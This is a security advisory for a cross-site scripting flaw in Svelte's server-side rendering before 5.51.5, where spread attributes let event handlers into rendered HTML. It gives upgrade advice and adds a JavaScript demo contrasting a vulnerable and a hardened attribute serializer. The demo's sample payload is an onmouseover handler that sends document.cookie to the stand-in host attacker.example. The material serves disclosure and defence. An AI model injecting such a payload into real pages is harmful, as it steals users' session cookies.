Old Svelte Software Can Let Hackers Run Malicious Code in Browsers
CVE-2026-27121
GHSA-f7gr-6p89-r883
Summary
Versions of Svelte, a popular web development framework, earlier than 5.51.5 can let attackers inject malicious code into server-rendered pages. The problem arises when an application spreads user-controlled data onto an element as HTML attributes: event-handler properties (for example onclick or onmouseover) contained in that data are written into the rendered HTML and execute in users' browsers. To stay safe, update to Svelte 5.51.5 or later.
What to do
- Update svelte to version 5.51.5 or later.
- Until you can upgrade, do not spread untrusted objects directly onto elements in server-rendered components; copy only an allowlist of expected attributes into the object you spread.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| svelte | svelte | < 5.51.5 | 5.51.5 |
Original title
Svelte affected by cross-site scripting via spread attributes in Svelte SSR
Original description
Versions of svelte prior to 5.51.5 are vulnerable to cross-site scripting (XSS) during server-side rendering. When using spread syntax to render attributes from untrusted data, event handler properties are included in the rendered HTML output. If an application spreads user-controlled or external data as element attributes, an attacker can inject malicious event handlers that execute in victims' browsers.
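The summary and the original description above both describe the same mechanism: an SSR attribute serializer that turns every key of a spread object into an HTML attribute, so an attacker-supplied onmouseover key becomes an inline event handler. The following is an added illustration written for this page; it is not Svelte's code and does not reproduce the actual fix. It uses a hypothetical minimal serializer (spreadAttrsVulnerable) beside a hardened variant (spreadAttrsHardened) that refuses event-handler names and restricts attribute-name syntax, and runs both over a constructed attacker payload.

```javascript
// Added illustration of the bug class in the advisory. Hypothetical code, not
// Svelte's: a minimal attribute serializer of the kind an SSR renderer uses
// when an object is spread onto an element, in vulnerable and hardened forms.

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable serializer: every key of the spread object becomes an attribute,
// including event-handler properties such as onmouseover. Value escaping does
// not help here, because the injected attribute NAME is the payload and the
// browser decodes entities in the value before evaluating the handler.
function spreadAttrsVulnerable(attrs) {
  return Object.entries(attrs)
    .map(([name, value]) => ` ${name}="${escapeAttr(value)}"`)
    .join("");
}

// Hardened serializer: event-handler properties (on*, case-insensitive) are
// never emitted, and names must match a conservative grammar so a key cannot
// smuggle in extra attributes or break out of the tag.
const SAFE_ATTR_NAME = /^[a-zA-Z][a-zA-Z0-9:_-]*$/;

function isEventHandler(name) {
  return /^on/i.test(name);
}

function spreadAttrsHardened(attrs) {
  return Object.entries(attrs)
    .filter(([name]) => SAFE_ATTR_NAME.test(name) && !isEventHandler(name))
    .map(([name, value]) => ` ${name}="${escapeAttr(value)}"`)
    .join("");
}

// Render a <div> whose attributes come from "profile" data, using the
// supplied serializer. Stands in for `<div {...profile}>` in a component.
function renderDiv(attrs, serialize) {
  return `<div${serialize(attrs)}>profile</div>`;
}

// Constructed sample: a JSON body an attacker could submit if the application
// stores it and later spreads it onto an element during SSR.
const attackerAttrs = JSON.parse(
  '{"class":"card","onmouseover":"fetch(\\"https://attacker.example/?c=\\"+document.cookie)"}'
);

// Returns both renderings so the difference can be inspected or asserted on.
function demo() {
  return {
    vulnerable: renderDiv(attackerAttrs, spreadAttrsVulnerable),
    hardened: renderDiv(attackerAttrs, spreadAttrsHardened),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const out = demo();
  console.log("vulnerable:", out.vulnerable);
  console.log("hardened:  ", out.hardened);
}
```

The vulnerable rendering carries an onmouseover attribute that fires as soon as a victim hovers the element; the hardened rendering keeps only class. Filtering on* names closes the specific hole the advisory describes, but it is the framework's job to do this; at the application level the robust fix remains the one in "What to do": spread only an allowlisted set of attributes you expect, rather than an arbitrary untrusted object.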
NVD CVSS 3.1: 5.4
NVD CVSS 4.0: 5.1
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026